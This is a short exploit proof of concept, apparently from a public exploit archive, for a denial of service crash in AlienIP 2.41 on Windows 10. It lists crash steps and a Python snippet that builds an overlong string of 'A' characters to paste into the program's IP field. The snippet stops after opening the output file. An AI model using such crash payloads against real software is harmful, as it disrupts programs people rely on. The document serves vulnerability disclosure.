# Exploit Title:AlienIP 2.41 - Denial of Service (PoC)
# Author: Arturo de la Cruz Tellez
# Discovery Date: 2018-10-17
# Vendor Homepage: http://www.armcode.com
# Tested Version: 2.41
# Tested on OS: Microsoft Windows 10 Home Single Language x64
# Versión 10.0.10240 compilación 10240
# PoC
# Steps to produce the crash
# 1.- Run python code : python AlienIP2.41.py
# 2.- Open AlienIP2.41.txt and copy context to clipboard
# 3.- Open AlienIP.exe
# 4.- Paste clipboard on IP address or Country
# 5.- Click in Locate host
# 5.- Enter
# 6.- Crashed alienip.exe dejo de funcionar
buffer = "\x41" * 200 + "." + "\x41" * 200 + "." + "\x41" * 200 + "." + "\x41" * 69
f = open ("AlienIP2.41.txt", "w")